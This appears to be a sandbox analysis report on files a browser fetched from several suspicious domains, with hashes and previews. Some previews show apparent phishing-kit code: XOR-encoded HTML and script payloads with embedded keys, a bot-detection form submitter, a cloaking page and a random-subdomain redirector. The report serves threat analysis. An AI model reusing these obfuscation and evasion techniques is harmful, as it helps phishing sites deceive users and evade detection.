                                                Preview:L..................F.@.. ...$+.,....w.q.EU..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.r....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.r..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.r...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............lb......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2693
                                                Entropy (8bit):3.997884605401436
                                                Encrypted:false
                                                SSDEEP:48:8xndmTCesHeidAKZdA14tseh7sFiZUkmgqeh7sXy+BX:8xYnrnNy
                                                MD5:CDE40E701ACBF5ED4870845D44558148
                                                SHA1:6749599690922D023CDCA83CA252BA99A84A7BC3
                                                SHA-256:92BC1DE78C9E50028E6C16422F76E2DA585AA097A718DC37EE5947D355259064
                                                SHA-512:CB6717833F7CADCBA5219D9B912611580017D8744816BD04D65D0E9D9E3A49C946A0C4DCE72E8CC56EA6E85C0C7DB7E9FA674ADDF586E866F5CFEF7B770DE39B
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.r....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.r..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............lb......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2681
                                                Entropy (8bit):3.982513685775961
                                                Encrypted:false
                                                SSDEEP:48:8odmTCedHeidAKZdA1vehDiZUkwqehly+R:8ZnPPy
                                                MD5:5F59F16CB64348B4E9B895BFDE1890E7
                                                SHA1:617CA850BCF41188A4DF978E8A34AD012A042457
                                                SHA-256:65A1AA08BDB5CE98F9863E9BCD0321F5257335D79899A41412E519CB01E590B7
                                                SHA-512:819686D5BEC93811644BE299CDAD8C3CD9B4EB2632C3CED693181755633501635C0DB638DBB3028E6A13667ED06EF7C5DA4326D97AB5307009C2DFE8B9EB8655
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....6?j.EU..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.r....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.r..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.r...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............lb......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2681
                                                Entropy (8bit):3.9697388383759793
                                                Encrypted:false
                                                SSDEEP:48:8odmTCedHeidAKZdA1hehBiZUk1W1qehzy+C:8Znv9Ty
                                                MD5:B2EA3FA75E841E5A7C1B0DA6E48D9BEF
                                                SHA1:B41723A60DD188EEF14271989ED5917711F08648
                                                SHA-256:2B300119F1BB9C39D6271FF59670AD1265410D55201A99F82980B10F91662D4C
                                                SHA-512:5F918A7226B46D06A82A25E9C55E3EBE1AB13E1B6439BF532C81C92902809E60FA07001BA982D46F26E11AF9369C56710698687BF07A0B8D58BB0961544B7DF0
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....h_x.EU..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.r....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.r..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.r...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............lb......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2683
                                                Entropy (8bit):3.980984961468887
                                                Encrypted:false
                                                SSDEEP:48:8eidmTCedHeidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbNy+yT+:8e7nnT/TbxWOvTbNy7T
                                                MD5:3B3775F007605340264392AEE995130F
                                                SHA1:F09092E32B389FDF01A75AEFEBF1B38944A2E5AB
                                                SHA-256:0E3CA05EC989FEDDF24F450F8698C7FB6D71EAA86B6E14EE4277439B88CE22B8
                                                SHA-512:06C98907C6FB6CD363A4ED110EB9B47232AD403764E456105E61D8326777B5883E3673B4C31897A2789288664702CFA03467646D746E2A8E591E433220DB2865
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....iS^.EU..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.r....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.r..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.r...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............lb......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JSON data
                                                Category:downloaded
                                                Size (bytes):21
                                                Entropy (8bit):3.594465636961452
                                                Encrypted:false
                                                SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                                MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                Malicious:false
                                                Reputation:low
                                                URL:https://api.ipify.org/?format=json
                                                Preview:{"ip":"8.46.123.189"}
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):929
                                                Entropy (8bit):4.762599876206931
                                                Encrypted:false
                                                SSDEEP:24:u/bJyRrx/VNmjdOElWY364QCATMz2i0/40duriuNYokGkvuZ+aWgjFvqDry4M:2dcrjwlWY364QCAoaP/DurhkbaWcqDHM
                                                MD5:7AD46618BBD1D5A01355FB119AACCD20
                                                SHA1:6B41139A95CC6AC69BCA4C1F7D75AF1B75E712FB
                                                SHA-256:FF991D34C50383BEC9AFB56E95DC40625577AC02054F99ECFB7D2C986C0A205E
                                                SHA-512:681C647B692FE6736CDB60D92C30768D088EF6DCC781597D200AEB3B7BB3DE4ED665CD85CA07DE4BF2ABD3E516FF4E01FE311610E7E7C11836BD56FE303ABD4D
                                                Malicious:false
                                                Reputation:low
                                                Preview:const currentURL = new URL(window.location.href);.const baseURL = `${currentURL.origin}${currentURL.pathname}`;.const newURL = `${baseURL}?_jd=botd`;.import(newURL).then((_b) => _b.load()).then((_b) => _b.detect())..then((_r) => {. let value;. if (window.location.pathname === '/') {. value = window.location.href.split(/\#|\?/)[1];. if (value) {. value = '/' + value. } else {. value = '/'. }. } else {. value = window.location.pathname;. }. window.history.replaceState({}, '', window.location.href.replace(window.location.hash, ''));. const form = document.createElement('form');. form.method = 'post';. const input = document.createElement('input');. input.type = 'hidden'; . input.name = _r.bot ? '_b' : '_r';. input.value = value;. form.appendChild(input);. document.body.appendChild(form);. . form.submit(). .}).catch()
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (2557)
                                                Category:downloaded
                                                Size (bytes):2945
                                                Entropy (8bit):5.440375327294984
                                                Encrypted:false
                                                SSDEEP:48:QNyV1fUYmgUPV5d5S0hccO86TxsErTqcUG2gYrB9FsCG7pnOQDqSxAV3T:QAJwgySI617rTqc8rvFskKAZ
                                                MD5:9D7BB226D6303A19CB1F5253A4EB3EA0
                                                SHA1:A9F76EF202D787AE346AF6B070F98DFBB49DD997
                                                SHA-256:A9A9C1EAAF7E1B589CAA101F11FF659E379D52C3CD73A1A8E5D6E437892C9553
                                                SHA-512:CD974470A01CAE6EE3D4ABF69B46A0D67AA29911C793B5080A46196D2FE972FD7C6DF0F06697D674F85C853D24064490930BEEDB31183FC9D7624BC5B8560078
                                                Malicious:false
                                                Reputation:low
                                                URL:https://5mzcue1v.doc.checkiteasy.com/
                                                Preview:<!DOCTYPE html>.<html>.<head>.<img src="tracker.php" alt="" style="display:none;">. <title>Your Privacy Matters</title>.</head>.<body>.<script>. var key = "secretkey";. var encodedHtml = "T0QnPSYgMjU8Uw0XHwlKYVkRBwgPUgkVBQJEUQANUFt+Vw0cEgFdeEVUS0VFHgAXE0UXAwQLAAAXT0chPyNUS0ddeEVUS0VFHgAXE0UaCggcTkcVGwADGwoLB0dDEQoaHwAXB1hBBQwQHw1EFwAVGwYRRhIQFxELXkUdBQwNGgQPXxYXCgkcTlRNQkdKYUVZU0VfBgwABwBHOgYGUigVBVlWBwwXHgBKYUVZU0VfHgwaAEULFgleUBYAEgkcAA0GFxFWSw0LFgNeUA0AHxUKSUpMEQEaARZXEAkMBwESBwQLFksAHQhbCg8YC0oPGwcHRAMWHRFOExIRGAoUFkpVXFVaW0oaABZMEwkYRQgQHUsAARZWVW9ZU0VDTgkdBQ5ZAQAPT0cHHxwVFhYLFwAASUURAQAFT0dbGBEAHwBNERYHSVtzT0oLFwQQVW9FEQoHC1t+VwEQBUUAHgQHGFhbBQARGwMdCAQNGgoNXwYbBREYGgsGAEdKYUVZU0VfFgwCSwYVEhYQT0cCDhcQFQwAExEdBAtUEAQRFkdKYUVZU0VDUkVUVwEQBUUAHgQHGFhbHwoEHUgXBAsNEgwNFxdWVW9ZU0VDUkVUS0VZU0VfGwgTSxYLEFhBXQwZCgIcXAkMFQpaGwseUUUAHgQHGFhbHwoEHUUYBAQdGgsEUEUVBxFEUSkMFQpWSwoXHwoCFlhWHw0QAEsAHgQHGCkQABFNAAAEBwQaFk1EHgoVDwwXFEJPUkIYBAQdFgFEW0dKYUVZU0VDUkVUV0odGhNdeG9US0VZU0VDUlkQAhNZE
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (12599)
                                                Category:downloaded
                                                Size (bytes):12774
                                                Entropy (8bit):5.323702562820299
                                                Encrypted:false
                                                SSDEEP:192:TbmscMgbai2w+7Lw8QnAFXQ9EkZNZ99StT0g9gPLDJ0K2ufmU9kccbRoNhflck:/nybx92LhQ+K99CT0dTD9hicWOflP
                                                MD5:B2184D1E2F4A1BEC954772EFAC779E7F
                                                SHA1:45E7A6622CE1756CE3638CE8433CE5D3E08B75BC
                                                SHA-256:59A704DA2AC001F437F78B243C5D6FDD76A4A14CA014862727AEA493F9CFF2B5
                                                SHA-512:E1F41B3E471CB828D0DB6E080F291613A3646DD2B0D097CC90006DE9BA1EAAFC7668BF875A2A32B57E06361E0A7CAD9427AE2555FFDDC28790DD634D7B5ACDF7
                                                Malicious:false
                                                Reputation:low
                                                URL:https://5mzcue1v.doc.checkiteasy.com/script.js
                                                Preview:var key = "jamesbond";.var encodedScript = "Dg4OEB4HARpKCwUJIAUHARooAxIZAB0HHUZDLi4gJhwMGwsKHi0CBBcHC0lISgAeHB0BT0ZNSlxTRQhvZU5ESkEBAAdCDhsQBQYfBBEACgohBwAECVNfT0lDUWxnRVNCTw0LBBIZRRoRIgEGAw0IRU5CQAc0Ag4DAA8LPw8AFgg9ChceLgAAGA4EAVwLQRoBGRVFCxIUBgkFHg4fSwYRChwlDQQDEVpZYmRpYEFNRVNNQE4jDxVNAB4DBgJEDBMCCFM3PSJEAgAeDVMVBhoMShIZFxoBG04SCw0EARIWBgEKZ2tNRVNCCRsKCRUECh1CCAsQLwwMDB8kHQEJPzMhTVpCFGNuSkFNRVNCT04HBQ8eEVMSDhwQGUFQRVsVBgAABRZDCRwBDhoNBQ9DFRIWBwAFBwRGEhoMCwETRA0CBhIWBgEKRBIIBAEBB0UTAw8JCgRMAwEHCxUECh1MBw8XAkhDFgMOBhpMRToxSlBdSVM5RUhWaHlvZU5ESkFNRVNCCQEWSkkOCh0RG04UCxMZRRwETx4FGBUeTFMZYmRESkFNRVNCT05ESkFCSlMhBwsHAUEEA1NFL0lEDxkEFgcRTwcKShUFAFMSDhwQSgUEFxYBGwIdZ2tNRVNCT05ESkFNRVMLCU5MGgAfEV0LAQ0IHwUIFltFL0lNQ0EWaHlCT05ESkFNRVNCT05ESkFNFxYWGhwKShEMFwdZYmRESkFNRVNCT05ESkEQaHlvZU5ESkFNRVNCT05EShUfHFMZYmRESkFNRVNCT05ESkFNRVNCDAEKGRVNARYBAAoBDkFQRRIWAAxMGgAfEVpZYmRESkFNRVNCT05ESkFNRVNCBghEQgUIBhwGCgpKAw8OCQYGCh1MTSFKTFpCFGNuSkFNRVNCT05ESkFNRVNCT05ESkEfAAcXHQBEDgQOChcHC1VpYEFNRVNCT05ESkFNRVNC
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:dropped
                                                Size (bytes):231
                                                Entropy (8bit):4.920063078708878
                                                Encrypted:false
                                                SSDEEP:6:hxuJzhqIziY2IXkXnLBrAMAQFjQLMhfvYm4Nhdx434QL:hY/0iMFjNfwm4Nbx4IQL
                                                MD5:A1D8A3A3085612C3BB30C210783C3668
                                                SHA1:2E1942747BBD92E725BF6274F2AB9C03E5958635
                                                SHA-256:DBB7A4D1DD474DDAB51DA0DB699C9BE45B82F5FBD319F8B7CABF6084D29CC057
                                                SHA-512:0FB961828A7B16D47A71A083563361FCB9057968DF0ADB1E3FAABD227BFD6733C4A49157B3ECB354A0A098DA70A5A4A8250D6E5FE40413B7B1FAB5129F07B317
                                                Malicious:false
                                                Reputation:low
                                                Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <title>Just a moment...</title>. <link rel="icon" type="image/x-icon" href="favicon.ico">. <script src="?_js=_1"></script>.</head>.<body>.</body>.</html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):231
                                                Entropy (8bit):4.920063078708878
                                                Encrypted:false
                                                SSDEEP:6:hxuJzhqIziY2IXkXnLBrAMAQFjQLMhfvYm4Nhdx434QL:hY/0iMFjNfwm4Nbx4IQL
                                                MD5:A1D8A3A3085612C3BB30C210783C3668
                                                SHA1:2E1942747BBD92E725BF6274F2AB9C03E5958635
                                                SHA-256:DBB7A4D1DD474DDAB51DA0DB699C9BE45B82F5FBD319F8B7CABF6084D29CC057
                                                SHA-512:0FB961828A7B16D47A71A083563361FCB9057968DF0ADB1E3FAABD227BFD6733C4A49157B3ECB354A0A098DA70A5A4A8250D6E5FE40413B7B1FAB5129F07B317
                                                Malicious:false
                                                Reputation:low
                                                URL:https://6p205g.ar.yourtaskforce.com/favicon.ico
                                                Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <title>Just a moment...</title>. <link rel="icon" type="image/x-icon" href="favicon.ico">. <script src="?_js=_1"></script>.</head>.<body>.</body>.</html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):1057
                                                Entropy (8bit):7.6851406288304105
                                                Encrypted:false
                                                SSDEEP:24:Qb0EcwtZDFHs70yTIy9pEq0WVBtXVMDug3iLRciNe47zz:QIEFA7pdl3tFEWRRPz
                                                MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                                                SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                                                SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                                                SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                                                Malicious:false
                                                Reputation:low
                                                URL:https://5mzcue1v.doc.checkiteasy.com/image/logo.png
                                                Preview:.PNG........IHDR...l.................pHYs...........~.....IDATh..XMN.P..\.E......' ,.-.$'.H....s...1.vQ.......4.........-.<......{..|.?.w[4....A.=h<>.......7..t.u..]A{..&...,..h.`D4.01]......H.&..C.w...@....*..a..3..H.aR.=.g.(.0.6...;Wl...X.X..G.Bf.....D4...K..p... ..hh.-b.R.Z....Z..zYQc}....u^..R.Dzm$..%c".....C.*z.\&U9P..0.3s*..31..@...W..2....yG.....c)k.F....3.I!....2..F.....`%1.....-..U.s(.p..S.($/...}(.5.\"k.+.I.Q...cb....kt..o.`.........%L....;.J.[..b.xx)c,X7.....)..'.n..H=E<.B.].g.}f.o...........znJ.....Q$....7...#.&..g.D..X....F..~=...%IQ.........e.....>.R..............s..[.D|l.n&..a06..d.5.5YGC..3N......<..Pt..\<{b...i.....)!.....8...0.t_.....8..T.......)G.-mzK....../..TDK..k..s"ch.0....i..`...`V..H.Q"...x......!.."..Q..%3O.L.....$....e.s.m..||.......AD."...#.%b,'..r!.}c...X!2kCD6..iX.\@S..3Er....B...D...%.O...(._...-....{b......z........r.N..W2....L.1~-.J.?.l....?..q:..W.5&.....|..>.B...G.oa.S.....1......Zo...q.....
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):4302
                                                Entropy (8bit):4.8051819626117185
                                                Encrypted:false
                                                SSDEEP:96:WlbczVkYQ7fiPv3DIbhEf41PJESO48mLnw+:WlbcaEPv3DIbo41PJESO48mLN
                                                MD5:C4772690CE4666275F53126A0D25EF06
                                                SHA1:70E2F36525485B19394E858D5AAC2E547F017DD5
                                                SHA-256:7165EA4E168AA399516671A63178504323591C1DCFBE48B6CA5B6E7386711683
                                                SHA-512:299EADA4C1E771A988685351A0C84F665445BDA67873A6CBF372278E1CA596BB91832375A0A5FE288DB2CD7E62516AF63884E5B03B66E9CA0FD297CFCC65D98A
                                                Malicious:false
                                                Reputation:low
                                                URL:https://5mzcue1v.doc.checkiteasy.com/style.css
                                                Preview:* {. margin: 0;. padding: 0;. box-sizing: border-box;.}..body {. font-family: 'Segoe UI', Arial, sans-serif;. background-color: #f5f5f5;. line-height: 1.6;. min-height: 100vh;.}...verification-container {. min-height: 100vh;. display: flex;. align-items: center;. justify-content: center;. padding: 1rem;.}...verification-card {. background: white;. border-radius: 8px;. box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);. width: 100%;. max-width: 400px;. overflow: hidden;.}../* Enhanced Logo Styles */..logo-container {. text-align: center;. padding: 1.5rem;. border-bottom: 1px solid #eee;. height: 120px;. display: flex;. align-items: center;. justify-content: center;.}...logo {. height: 40px;. width: auto;. max-width: 160px;. object-fit: contain;. transition: opacity 0.3s ease;.}...logo[src*="logo.clearbit.com"] {. height: 100px;. max-width: 300px;. min-height: 80px;.}...logo[src*="google.com/s2/fav
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):409
                                                Entropy (8bit):5.233583937739655
                                                Encrypted:false
                                                SSDEEP:12:hYOiMRGCh3yUxx70k01XGNMhKEsd4NbxxQL:hYXix01WNuUd4NQ
                                                MD5:8AEA5DA6F3C846841267EE24E59DF12F
                                                SHA1:F4A2E8482D53AEDE8A87CAFF3F0D9CC7735CBC8A
                                                SHA-256:8AFE97B88D47B53F9BF8339C9CF4787B63756F5AA7BFDEB1EBAD4061565944AE
                                                SHA-512:A6C83BA93CAF444DE3C81722851B237B9334A95204B0D3DEA00521A39BF1149050C446E98019E477E5B71291F1C9005EDC4A21D9819958ABEB26BC1E939D01DF
                                                Malicious:false
                                                Reputation:low
                                                URL:https://main.d3qs0n0oqv3g7o.amplifyapp.com/
                                                Preview:<!DOCTYPE html>.<html>.<head>.<meta charset="UTF-8">.<title>Safe Link</title>.<script>. let arr = new Uint8Array(6);. crypto.getRandomValues(arr);. let sub = Array.from(arr, b => (b % 36).toString(36)).join('');. let domain = "ar.yourtaskforce.com";..location.replace(`https://${sub}.${domain}${location.pathname}${location.search}${location.hash}`);.</script>.</head>.<body>Redirecting...</body>.</html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (2557)
                                                Category:dropped
                                                Size (bytes):2945
                                                Entropy (8bit):5.440375327294984
                                                Encrypted:false
                                                SSDEEP:48:QNyV1fUYmgUPV5d5S0hccO86TxsErTqcUG2gYrB9FsCG7pnOQDqSxAV3T:QAJwgySI617rTqc8rvFskKAZ
                                                MD5:9D7BB226D6303A19CB1F5253A4EB3EA0
                                                SHA1:A9F76EF202D787AE346AF6B070F98DFBB49DD997
                                                SHA-256:A9A9C1EAAF7E1B589CAA101F11FF659E379D52C3CD73A1A8E5D6E437892C9553
                                                SHA-512:CD974470A01CAE6EE3D4ABF69B46A0D67AA29911C793B5080A46196D2FE972FD7C6DF0F06697D674F85C853D24064490930BEEDB31183FC9D7624BC5B8560078
                                                Malicious:false
                                                Reputation:low
                                                Preview:<!DOCTYPE html>.<html>.<head>.<img src="tracker.php" alt="" style="display:none;">. <title>Your Privacy Matters</title>.</head>.<body>.<script>. var key = "secretkey";. var encodedHtml = "T0QnPSYgMjU8Uw0XHwlKYVkRBwgPUgkVBQJEUQANUFt+Vw0cEgFdeEVUS0VFHgAXE0UXAwQLAAAXT0chPyNUS0ddeEVUS0VFHgAXE0UaCggcTkcVGwADGwoLB0dDEQoaHwAXB1hBBQwQHw1EFwAVGwYRRhIQFxELXkUdBQwNGgQPXxYXCgkcTlRNQkdKYUVZU0VfBgwABwBHOgYGUigVBVlWBwwXHgBKYUVZU0VfHgwaAEULFgleUBYAEgkcAA0GFxFWSw0LFgNeUA0AHxUKSUpMEQEaARZXEAkMBwESBwQLFksAHQhbCg8YC0oPGwcHRAMWHRFOExIRGAoUFkpVXFVaW0oaABZMEwkYRQgQHUsAARZWVW9ZU0VDTgkdBQ5ZAQAPT0cHHxwVFhYLFwAASUURAQAFT0dbGBEAHwBNERYHSVtzT0oLFwQQVW9FEQoHC1t+VwEQBUUAHgQHGFhbBQARGwMdCAQNGgoNXwYbBREYGgsGAEdKYUVZU0VfFgwCSwYVEhYQT0cCDhcQFQwAExEdBAtUEAQRFkdKYUVZU0VDUkVUVwEQBUUAHgQHGFhbHwoEHUgXBAsNEgwNFxdWVW9ZU0VDUkVUS0VZU0VfGwgTSxYLEFhBXQwZCgIcXAkMFQpaGwseUUUAHgQHGFhbHwoEHUUYBAQdGgsEUEUVBxFEUSkMFQpWSwoXHwoCFlhWHw0QAEsAHgQHGCkQABFNAAAEBwQaFk1EHgoVDwwXFEJPUkIYBAQdFgFEW0dKYUVZU0VDUkVUV0odGhNdeG9US0VZU0VDUlkQAhNZE
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):764
                                                Entropy (8bit):4.74727172577332
                                                Encrypted:false
                                                SSDEEP:12:f8WJMHx14yOu/hz/zHoaNOU4/c/UddFB6MrYJmV4Mr2iWxmrp2AptAv9VVZ8BHA:k1x14wxHoaNO38mV5r2Zmrp2sAv9OBHA
                                                MD5:AF7363CA84DC1C09C5ABB69DDA664EEA
                                                SHA1:1B1497B9DB7EEFB594E45BF4165C75F05AE64E12
                                                SHA-256:3CE5BCA513C0D0115CDEF2D28CB59EC98E1CD70A33C4CC839B60366EA28C7CA6
                                                SHA-512:1828ACE2F7A24846755CEDE958555C58D35B8797790BFE4F6A2C181D5FF751B408F891524298688C2404D9554D2194A9F493616A5CF8F7CDD68CA99EF8663A1A
                                                Malicious:false
                                                Reputation:low
